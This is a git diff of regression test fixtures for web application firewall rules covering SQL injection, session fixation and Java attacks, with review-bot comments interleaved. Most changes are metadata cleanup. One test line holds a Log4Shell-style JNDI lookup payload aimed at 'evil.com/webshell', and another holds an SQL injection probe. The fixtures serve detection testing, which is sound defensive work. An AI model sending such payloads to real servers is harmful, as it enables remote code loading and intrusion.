a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942370.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942370.yaml @@ -6,7 +6,8 @@ meta: WARNING: these tests were derived from the existing expressions and are semantically meaningless. The tests were used to ensure that a change to the assembly file would not change the semantics. - If you know what a particular expression is supposed to catch, please revise the associated test.rule_id: 942370 + If you know what a particular expression is supposed to catch, please revise the associated test. +rule_id: 942370 tests: - test_id: 1 desc: | diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942380.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942380.yaml index ee0cf1b02..c3445da07 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942380.yaml 
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942380.yaml @@ -1,7 +1,7 @@ --- meta: author: "Christoph Hansen, azurit" - description: None +rule_id: 942380 tests: - test_id: 1 desc: "SQL Injection Attack" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942390.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942390.yaml index 503274696..05ce6b989 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942390.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942390.yaml @@ -1,7 +1,7 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None +rule_id: 942390 tests: - test_id: 1 desc: "SQL Injection Attack" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942400.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942400.yaml index 46b912d71..2de63c416 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942400.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942400.yaml @@ -1,7 +1,7 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None +rule_id: 942400 tests: - test_id: 1 desc: "SQL Injection Attack" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942410.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942410.yaml index 8398d2f7c..a3ee7e847 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942410.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942410.yaml @@ -1,7 +1,7 @@ --- meta: author: "Christoph Hansen, azurit" - description: None +rule_id: 942410 tests: - test_id: 1 desc: "SQL Injection Attack" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942420.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942420.yaml index 865399199..b0d3ee0e6 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942420.yaml 
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942420.yaml @@ -1,7 +1,7 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None +rule_id: 942420 tests: - test_id: 1 desc: "Restricted SQL Character Anomaly Detection (cookies): # of special characters exceeded (8)" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942421.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942421.yaml index 22dc08ea6..4b71697ff 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942421.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942421.yaml @@ -1,7 +1,7 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None +rule_id: 942421 tests: - test_id: 1 desc: "Restricted SQL Character Anomaly Detection (cookies): # of special characters exceeded (3)" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942430.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942430.yaml index c0dd5a946..b8e732451 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942430.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942430.yaml @@ -1,7 +1,7 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None +rule_id: 942430 tests: - test_id: 1 desc: "Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942431.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942431.yaml index fd9cea392..0254f2112 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942431.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942431.yaml @@ -1,7 +1,7 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None +rule_id: 942431 tests: - test_id: 1 desc: "Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)" 
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942432.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942432.yaml index b43434dea..0a34adce1 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942432.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942432.yaml @@ -1,7 +1,7 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None +rule_id: 942432 tests: - test_id: 1 desc: "Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942440.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942440.yaml index 7ce8e3c34..7af45734d 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942440.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942440.yaml @@ -1,7 +1,7 @@ --- meta: author: "Christian S.J. Peron, Max Leske, azurit" - description: None +rule_id: 942440 tests: - test_id: 1 desc: "SQL Comment Sequence" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942450.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942450.yaml index 6254021d0..bf0f304cd 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942450.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942450.yaml @@ -1,7 +1,7 @@ --- meta: author: "William Woodson, azurit" - description: None +rule_id: 942450 tests: - test_id: 1 desc: "SQL Hex Encoding" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942460.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942460.yaml index 49e020b98..9a2b72a23 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942460.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942460.yaml 
@@ -1,7 +1,7 @@ --- meta: author: "Franziska Bühler, azurit" - description: None +rule_id: 942460 tests: - test_id: 1 desc: "Repetitive Non-Word Characters" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942470.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942470.yaml index 72caff6e7..3496a13e4 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942470.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942470.yaml @@ -1,7 +1,7 @@ --- meta: author: "Christoph Hansen, azurit" - description: None +rule_id: 942470 tests: - test_id: 1 desc: "SQL Injection Attack" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942480.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942480.yaml index e12ca7023..cf93c29b3 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942480.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942480.yaml @@ -1,7 +1,7 @@ --- meta: author: "Jose Nazario, azurit" - description: None +rule_id: 942480 tests: - test_id: 1 desc: "SQL Injection Attack" @@ -16,25 +16,11 @@ tests: method: GET port: 80 # variable name boundary attacks - uri: "/?'msdasql'" + uri: "/get?'msdasql'" version: HTTP/1.0 output: log: expect_ids: [942480] - - test_id: 2 - desc: "SQL Injection Attack" - stages: - - input: - dest_addr: "127.0.0.1" - headers: - Host: "localhost" - Cache-Control: "no-cache, no-store, must-revalidate" - # variable name boundary attacks - uri: "/get?'msdasql'" - version: HTTP/1.0 - output: - log: - expect_ids: [942480] - test_id: 2 desc: "SQL Injection Attack" stages: diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942490.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942490.yaml index d91924c63..910071cd0 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942490.yaml 
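Review bot: In the 942480.yaml hunk at `@@ -16,25 +16,11 @@` test 1's request moves from `/?'msdasql'` to `/get?'msdasql'` and the duplicate `test_id: 2` that already used `/get?'msdasql'` is removed, so the root-path form of the `'msdasql'` boundary payload is no longer sent by any test visible in the hunk. Deleting the second block is right — two entries shared `test_id: 2` — but if the root path was dropped because the backend does not answer `/` with a usable status rather than because it is redundant, say so with a comment above `uri:`, e.g. `# /get rather than / so the test backend answers 200 on every platform`. The removed block also carried `Cache-Control: "no-cache, no-store, must-revalidate"`; test 1's `headers:` are above the hunk, so whether that variant is still exercised cannot be seen here. The surviving `test_id: 2` starts inside the hunk and continues past its end.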
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942490.yaml @@ -1,7 +1,7 @@ --- meta: author: "Christoph Hansen, azurit" - description: None +rule_id: 942490 tests: - test_id: 1 desc: "classic SQL injection probings 3/3" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942510.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942510.yaml index f350dee55..622884924 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942510.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942510.yaml @@ -1,7 +1,7 @@ --- meta: author: "Franziska Buehler, azurit" - description: None +rule_id: 942510 tests: - test_id: 1 desc: "SQLi bypass detected: backticks" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942511.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942511.yaml index 7dd1d827b..a2096ccbe 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942511.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942511.yaml @@ -1,7 +1,7 @@ --- meta: author: "Walter Hop, azurit" - description: None +rule_id: 942511 tests: - test_id: 1 desc: "SQLi bypass detected: quotes" diff --git a/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943100.yaml b/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943100.yaml index 33658babd..56e504cef 100644 --- a/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943100.yaml +++ b/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943100.yaml @@ -1,7 +1,7 @@ --- meta: author: "csanders-git, azurit" - description: None +rule_id: 943100 tests: - test_id: 1 desc: Session Fixation Attack (943100) from old modsec regressions 
diff --git a/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943110.yaml b/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943110.yaml index cbd725d85..f0a02000d 100644 --- a/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943110.yaml +++ b/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943110.yaml @@ -1,7 +1,7 @@ --- meta: author: "csanders-git, azurit" - description: None +rule_id: 943110 tests: - test_id: 1 desc: Session Fixation Attack (943110) from old modsec regressions diff --git a/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943120.yaml b/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943120.yaml index e845e93de..33a874629 100644 --- a/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943120.yaml +++ b/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943120.yaml @@ -1,7 +1,7 @@ --- meta: author: "csanders-git, azurit" - description: None +rule_id: 943120 tests: - test_id: 1 desc: Session Fixation Attack (943120) from old modsec regressions diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944130.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944130.yaml index 9eac2d2ed..b08f7b265 100644 --- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944130.yaml +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944130.yaml @@ -1,7 +1,6 @@ --- meta: author: "spartantri, azurit" - description: "Positive tests for rule 944130" rule_id: 944130 tests: - test_id: 1 diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944140.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944140.yaml index 56e884e21..a1f312d84 100644 --- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944140.yaml +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944140.yaml 
@@ -1,7 +1,7 @@ --- meta: author: "lifeforms, azurit" - description: None +rule_id: 944140 tests: - test_id: 1 desc: Java script uploads diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944150.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944150.yaml index 4f7e39fdd..47f48e5e1 100644 --- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944150.yaml +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944150.yaml @@ -1,6 +1,6 @@ --- -# NOTE: Please keep these tests in sync with 944151.yaml. -# 944151 should detect the same things as 944150. +# NOTE: Please keep these tests in sync with 944151.yaml and 944152.yaml. +# 944150 should detect the same things as 944151 and 944152. meta: author: "dune73, Max Leske, azurit" rule_id: 944150 @@ -196,7 +196,7 @@ tests: method: POST port: 80 uri: "/post" - data: '{"foo": "${jndi:ldap://evil.com/webshell}"}' + data: '{"foo": "$\u007bjndi:ldap://evil.com/webshell}"}' version: "HTTP/1.1" output: log: diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944151.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944151.yaml index 1c15911e4..f056faeac 100644 --- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944151.yaml +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944151.yaml @@ -1,6 +1,6 @@ --- -# NOTE: Please keep these tests in sync with 944151.yaml. -# 944151 should detect the same things as 944151. +# NOTE: Please keep these tests in sync with 944150.yaml and 944152.yaml. +# 944151 should detect the same things as 944150 and 944152. meta: author: "dune73, Max Leske, azurit" rule_id: 944151 diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944152.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944152.yaml index 4621656e8..f1509f20d 100644 --- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944152.yaml 
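Review bot: The `data:` line in the 944150.yaml hunk at `@@ -196,7 +196,7 @@` now sends the opening brace as the JSON escape `\u007b` instead of a literal `{`; the value is single-quoted YAML, so the six characters `\u007b` go on the wire and 944150 can only match if the engine's JSON body processor decodes the escape before the rule inspects the value. The `expect_ids` below the line are unchanged, and the literal `${jndi:` form is no longer sent by this test; unless another test in the file still sends it, keep both as separate tests, and add a comment above `data:` such as `# "$\u007b" is the JSON escape for "${" — checks that the JSON body processor decodes it before 944150 runs`. The header comment rewritten in the same patch asks that 944150, 944151 and 944152 stay in sync, yet the 944151.yaml and 944152.yaml hunks here change only that comment, so the escaped-brace variant appears to exist only in 944150 — apply the same change there or note why it differs. The test containing this `data:` line starts above the hunk.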
+++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944152.yaml @@ -1,6 +1,6 @@ --- -# NOTE: Please keep these tests in sync with 944152.yaml and 944151.yaml. -# 944152 should detect the same things as 944152 and 944151. +# NOTE: Please keep these tests in sync with 944150.yaml and 944151.yaml. +# 944152 should detect the same things as 944150 and 944151. meta: author: "dune73, Max Leske, azurit" rule_id: 944152 diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944210.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944210.yaml index 40cee4887..8aa888914 100644 --- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944210.yaml +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944210.yaml @@ -1,7 +1,6 @@ --- meta: author: "spartantri, azurit" - description: "Positive tests for rule 944210" rule_id: 944210 tests: - test_id: 1 diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944240.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944240.yaml index 5b4807405..7d5a2ef38 100644 --- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944240.yaml +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944240.yaml @@ -1,7 +1,6 @@ --- meta: author: "spartantri, azurit" - description: "Positive tests for rule 944240" rule_id: 944240 tests: - test_id: 1 diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944250.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944250.yaml index 19789faf8..b9aa24729 100644 --- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944250.yaml +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944250.yaml @@ -1,7 +1,6 @@ --- meta: author: "spartantri, azurit" - description: "Positive tests for rule 944250" rule_id: 944250 tests: - test_id: 1 
diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944260.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944260.yaml
index bf411fe7c..d6a8d28e8 100644
--- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944260.yaml
+++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944260.yaml
@@ -1,7 +1,6 @@
 ---
 meta:
 author: "theMiddle, azurit"
- description: "Positive tests for rule 944260"
 rule_id: 944260
 tests:
 - test_id: 1
diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944300.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944300.yaml
index dc8a22494..9ab732eb5 100644
--- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944300.yaml
+++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944300.yaml
@@ -1,7 +1,6 @@
 ---
 meta:
 author: "spartantri, azurit"
- description: "Positive tests for rule 944300"
 rule_id: 944300
 tests:
 - test_id: 1
@@ -61,7 +60,6 @@ tests:
 method: "POST"
 uri: "/post"
 version: "HTTP/1.0"
- data: "test=value"
 output:
 log:
 expect_ids: [944300]
@@ -82,7 +80,6 @@ tests:
 method: "POST"
 uri: "/post"
 version: "HTTP/1.0"
- data: "test=value"
 output:
 log:
 expect_ids: [944300]
@@ -103,7 +100,6 @@ tests:
 method: "POST"
 uri: "/post"
 version: "HTTP/1.0"
- data: "test=value"
 output:
 log:
 expect_ids: [944300]
@@ -284,7 +280,6 @@ tests:
 method: "POST"
 uri: "/post"
 version: "HTTP/1.0"
- data: "test=value"
 output:
 log:
 expect_ids: [944300]
@@ -305,7 +300,6 @@ tests:
 method: "POST"
 uri: "/post"
 version: "HTTP/1.0"
- data: "test=value"
 output:
 log:
 expect_ids: [944300]
@@ -326,7 +320,6 @@ tests:
 method: "POST"
 uri: "/post"
 version: "HTTP/1.0"
- data: "test=value"
 output:
 log:
 expect_ids: [944300]
@@ -507,7 +500,6 @@ tests:
 method: "POST"
 uri: "/post"
 version: "HTTP/1.0"
- data: "test=value"
 output:
 log:
 expect_ids: [944300]
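Review bot: From the 944300.yaml hunk at `@@ -61,7 +60,6 @@` onward, removing `data: "test=value"` leaves each request as a `POST` to `/post` with `version: "HTTP/1.0"` and no body at all; the hunks do not show where the 944300 payload is placed (each test's `headers:` sit above the hunk), so whether the rule is now matched from headers alone cannot be verified from this patch. If the body was dropped because `test=value` never carried the payload, make the bodiless POST look intentional rather than like a truncated fixture with a comment above `method: "POST"`, e.g. `# payload is carried in the request headers; the POST deliberately sends no body`. If the intent was instead to keep a form-encoded body that does not trip other rules, re-add `data:` with such a value. Every test block affected by these hunks starts and ends outside the hunk.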
@@ -528,7 +520,6 @@ tests:
 method: "POST"
 uri: "/post"
 version: "HTTP/1.0"
- data: "test=value"
 output:
 log:
 expect_ids: [944300]
@@ -549,7 +540,6 @@ tests:
 method: "POST"
 uri: "/post"
 version: "HTTP/1.0"
- data: "test=value"
 output:
 log:
 expect_ids: [944300]
@@ -730,7 +720,6 @@ tests:
 method: "POST"
 uri: "/post"
 version: "HTTP/1.0"
- data: "test=value"
 output:
 log:
 expect_ids: [944300]
@@ -751,7 +740,6 @@ tests:
 method: "POST"
 uri: "/post"
 version: "HTTP/1.0"
- data: "test=value"
 output:
 log:
 expect_ids: [944300]
@@ -772,7 +760,6 @@ tests:
 method: "POST"
 uri: "/post"
 version: "HTTP/1.0"
- data: "test=value"
 output:
 log:
 expect_ids: [944300]
@@ -953,7 +940,6 @@ tests:
 method: "POST"
 uri: "/post"
 version: "HTTP/1.0"
- data: "test=value"
 output:
 log:
 expect_ids: [944300]
@@ -974,7 +960,6 @@ tests:
 method: "POST"
 uri: "/post"
 version: "HTTP/1.0"
- data: "test=value"
 output:
 log:
 expect_ids: [944300]
@@ -995,7 +980,6 @@ tests:
 method: "POST"
 uri: "/post"
 version: "HTTP/1.0"
- data: "test=value"
 output:
 log:
 expect_ids: [944300]
@@ -1176,7 +1160,6 @@ tests:
 method: "POST"
 uri: "/post"
 version: "HTTP/1.0"
- data: "test=value"
 output:
 log:
 expect_ids: [944300]
@@ -1197,7 +1180,6 @@ tests:
 method: "POST"
 uri: "/post"
 version: "HTTP/1.0"
- data: "test=value"
 output:
 log:
 expect_ids: [944300]
@@ -1218,7 +1200,6 @@ tests:
 method: "POST"
 uri: "/post"
 version: "HTTP/1.0"
- data: "test=value"
 output:
 log:
 expect_ids: [944300]
@@ -1399,7 +1380,6 @@ tests:
 method: "POST"
 uri: "/post"
 version: "HTTP/1.0"
- data: "test=value"
 output:
 log:
 expect_ids: [944300]
@@ -1420,7 +1400,6 @@ tests:
 method: "POST"
 uri: "/post"
 version: "HTTP/1.0"
- data: "test=value"
 output:
 log:
 expect_ids: [944300]
@@ -1441,7 +1420,6 @@ tests:
 method: "POST"
 uri: "/post"
 version: "HTTP/1.0"
- data: "test=value"
 output:
 log:
 expect_ids: [944300]
@@ -1622,7 +1600,6 @@ tests:
 method: "POST"
 uri: "/post"
 version: "HTTP/1.0"
- data: "test=value"
 output:
 log:
 expect_ids: [944300]
@@ -1643,7 +1620,6 @@ tests:
 method: "POST"
 uri: "/post"
 version: "HTTP/1.0"
- data: "test=value"
 output:
 log:
 expect_ids: [944300]
@@ -1664,7 +1640,6 @@ tests:
 method: "POST"
 uri: "/post"
 version: "HTTP/1.0"
- data: "test=value"
 output:
 log:
 expect_ids: [944300]
@@ -1845,7 +1820,6 @@ tests:
 method: "POST"
 uri: "/post"
 version: "HTTP/1.0"
- data: "test=value"
 output:
 log:
 expect_ids: [944300]
@@ -1866,7 +1840,6 @@ tests:
 method: "POST"
 uri: "/post"
 version: "HTTP/1.0"
- data: "test=value"
 output:
 log:
 expect_ids: [944300]
@@ -1887,7 +1860,6 @@ tests:
 method: "POST"
 uri: "/post"
 version: "HTTP/1.0"
- data: "test=value"
 output:
 log:
 expect_ids: [944300]
@@ -2068,7 +2040,6 @@ tests:
 method: "POST"
 uri: "/post"
 version: "HTTP/1.0"
- data: "test=value"
 output:
 log:
 expect_ids: [944300]
@@ -2089,7 +2060,6 @@ tests:
 method: "POST"
 uri: "/post"
 version: "HTTP/1.0"
- data: "test=value"
 output:
 log:
 expect_ids: [944300]
@@ -2110,7 +2080,6 @@ tests:
 method: "POST"
 uri: "/post"
 version: "HTTP/1.0"
- data: "test=value"
 output:
 log:
 expect_ids: [944300]
@@ -2291,7 +2260,6 @@ tests:
 method: "POST"
 uri: "/post"
 version: "HTTP/1.0"
- data: "test=value"
 output:
 log:
 expect_ids: [944300]
@@ -2312,7 +2280,6 @@ tests:
 method: "POST"
 uri: "/post"
 version: "HTTP/1.0"
- data: "test=value"
 output:
 log:
 expect_ids: [944300]
@@ -2333,7 +2300,6 @@ tests:
 method: "POST"
 uri: "/post"
 version: "HTTP/1.0"
- data: "test=value"
 output:
 log:
 expect_ids: [944300]
@@ -2514,7 +2480,6 @@ tests:
 method: "POST"
 uri: "/post"
 version: "HTTP/1.0"
- data: "test=value"
 output:
 log:
 expect_ids: [944300]
@@ -2535,7 +2500,6 @@ tests:
 method: "POST"
 uri: "/post"
 version: "HTTP/1.0"
- data: "test=value"
 output:
 log:
 expect_ids: [944300]
@@ -2556,7 +2520,6 @@ tests:
 method: "POST"
 uri: "/post"
 version: "HTTP/1.0"
- data: "test=value"
 output:
 log:
 expect_ids: [944300]
@@ -2737,7 +2700,6 @@ tests:
 method: "POST"
 uri: "/post"
 version: "HTTP/1.0"
- data: "test=value"
 output:
 log:
 expect_ids: [944300]
@@ -2758,7 +2720,6 @@ tests:
 method: "POST"
 uri: "/post"
 version: "HTTP/1.0"
- data: "test=value"
 output:
 log:
 expect_ids: [944300]
@@ -2779,7 +2740,6 @@ tests:
 method: "POST"
 uri: "/post"
 version: "HTTP/1.0"
- data: "test=value"
 output:
 log:
 expect_ids: [944300]
@@ -2960,7 +2920,6 @@ tests:
 method: "POST"
 uri: "/post"
 version: "HTTP/1.0"
- data: "test=value"
 output:
 log:
 expect_ids: [944300]
@@ -2981,7 +2940,6 @@ tests:
 method: "POST"
 uri: "/post"
 version: "HTTP/1.0"
- data: "test=value"
 output:
 log:
 expect_ids: [944300]
@@ -3002,7 +2960,6 @@ tests:
 method: "POST"
 uri: "/post"
 version: "HTTP/1.0"
- data: "test=value"
 output:
 log:
 expect_ids: [944300]
@@ -3183,7 +3140,6 @@ tests:
 method: "POST"
 uri: "/post"
 version: "HTTP/1.0"
- data: "test=value"
 output:
 log:
 expect_ids: [944300]
@@ -3204,7 +3160,6 @@ tests:
 method: "POST"
 uri: "/post"
 version: "HTTP/1.0"
- data: "test=value"
 output:
 log:
 expect_ids: [944300]
@@ -3225,7 +3180,6 @@ tests:
 method: "POST"
 uri: "/post"
 version: "HTTP/1.0"
- data: "test=value"
 output:
 log:
 expect_ids: [944300]
@@ -3406,7 +3360,6 @@ tests:
 method: "POST"
 uri: "/post"
 version: "HTTP/1.0"
- data: "test=value"
 output:
 log:
 expect_ids: [944300]
@@ -3427,7 +3380,6 @@ tests:
 method: "POST"
 uri: "/post"
 version: "HTTP/1.0"
- data: "test=value"
 output:
 log:
 expect_ids: [944300]
@@ -3448,7 +3400,6 @@ tests:
 method: "POST"
 uri: "/post"
 version: "HTTP/1.0"
- data: "test=value"
 output:
 log:
 expect_ids: [944300]
@@ -3629,7 +3580,6 @@ tests:
 method: "POST"
 uri: "/post"
 version: "HTTP/1.0"
- data: "test=value"
 output:
 log:
 expect_ids: [944300]
@@ -3650,7 +3600,6 @@ tests:
 method: "POST"
 uri: "/post"
 version: "HTTP/1.0"
- data: "test=value"
 output:
 log:
 expect_ids: [944300]
@@ -3671,7 +3620,6 @@ tests:
 method: "POST"
 uri: "/post"
 version: "HTTP/1.0"
- data: "test=value"
 output:
 log:
 expect_ids: [944300]
@@ -3852,7 +3800,6 @@ tests:
 method: "POST"
 uri: "/post"
 version: "HTTP/1.0"
- data: "test=value"
 output:
 log:
 expect_ids: [944300]
@@ -3873,7 +3820,6 @@ tests:
 method: "POST"
 uri: "/post"
 version: "HTTP/1.0"
- data: "test=value"
 output:
 log:
 expect_ids: [944300]
@@ -3894,7 +3840,6 @@ tests:
 method: "POST"
 uri: "/post"
 version: "HTTP/1.0"
- data: "test=value"
 output:
 log:
 expect_ids: [944300]
@@ -4075,7 +4020,6 @@ tests:
 method: "POST"
 uri: "/post"
 version: "HTTP/1.0"
- data: "test=value"
 output:
 log:
 expect_ids: [944300]
@@ -4096,7 +4040,6 @@ tests:
 method: "POST"
 uri: "/post"
 version: "HTTP/1.0"
- data: "test=value"
 output:
 log:
 expect_ids: [944300]
@@ -4117,7 +4060,6 @@ tests:
 method: "POST"
 uri: "/post"
 version: "HTTP/1.0"
- data: "test=value"
 output:
 log:
 expect_ids: [944300]
